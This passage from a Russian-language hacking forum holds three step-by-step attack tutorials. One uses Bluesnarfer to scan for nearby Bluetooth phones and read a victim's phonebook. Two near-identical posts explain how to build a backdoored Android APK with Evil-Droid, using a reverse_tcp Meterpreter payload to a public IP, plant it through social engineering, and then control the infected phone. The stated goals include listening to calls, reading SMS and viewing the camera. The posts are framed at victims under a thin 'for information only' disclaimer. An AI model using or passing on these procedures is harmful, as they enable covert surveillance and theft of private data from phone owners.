предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  23. Bluetooth — производственная спецификация беспроводных персональных сетей (Wireless personal area network). Bluetooth обеспечивает обмен информацией между персональными устройствами. Спецификация Bluetooth была разработана группой Bluetooth Special Interest Group, которая была основана в 1998 году. Данная технология по сей день остается актуальной и используется во многих персональных устройствах. В рамках данной статьи мы разберемся, насколько безопасна данная технология, а также разберем метод эксплуатации уязвимостей Bluetooth с помощью утилиты под названием Bluesnarfer. Установка и эксплуатация Открываем терминал и вводим команду для обновления пакетов: sudo apt-get update && apt-get upgrade Далее клонируем репозиторий с помощью команды: git clone https://github.com/boos/bluesnarfer Переходим в директорию: cd bluesnarfer И компилируем утилиту: make После того, как инструмент полностью боеспособен, включаем режим мониторинга на нашем Bluetooth-адаптере: hciconfig hci0 up Далее сканируем доступные устройства с включенным Bluetooth: hcitool scan Запоминаем MAC-адрес нашего целевого устройства. Теперь нам нужно убедиться в том, что устройство не спит: l2ping Просматриваем возможность подключения к жертве, используя rfcomm: sdptool browse --tree --l2cap адрес жертвы> Если устройство жертвы подходит под наши требования, то мы можем спокойно произвести атаку. Например, с помощью данной команды мы можем просмотреть телефонную книгу нашей жертвы: bluesnarfer -r -b Но это не все возможности данной утилиты. Для того, чтобы ознакомиться с полным функционалом инструмента, вводим команду для вывода справки: bluesnarfer -h Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  24. Привет, хакеры, в этой статье поговорим о взломе андроид смартфонов. Сегодня многие думают о том, чтобы взломать смартфон, удалённо прослушивать разговоры, просматривать смс-ки и самое интересное – смотреть через вебку. Взлом игр, приложений на андроид был доступен уже очень давно, чуть ли не с первых версий. Точнее сказать, тогда это было возможно, но не так популярно. Начнём с того, что андроид является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Мы уже публиковали статью, где рассказали о самых популярных приложениях для взлома и тестирования безопасности на андроид. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Давайте разберемся, что нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке, и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список, воспользуйтесь параметром –help или -h(идентичны). Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  25. Приветствую хакеры, наверно каждый из вас хоть раз хотел взломать смартфон, удалённо прослушивать разговоры, просматривать SMS и т.д. И это вполне возможно сделать. В этой статье я вам расскажу и покажу (скриншоты), как можно получить доступ к Android-смартфону. Кое-что об Android Начну с того, что что Android является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Итак, начнем! Для взлома нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того, чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список воспользуйтесь параметром –help или -h (идентичны). Для лучшего восприятия процесса взлома прикрепляю скриншоты Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.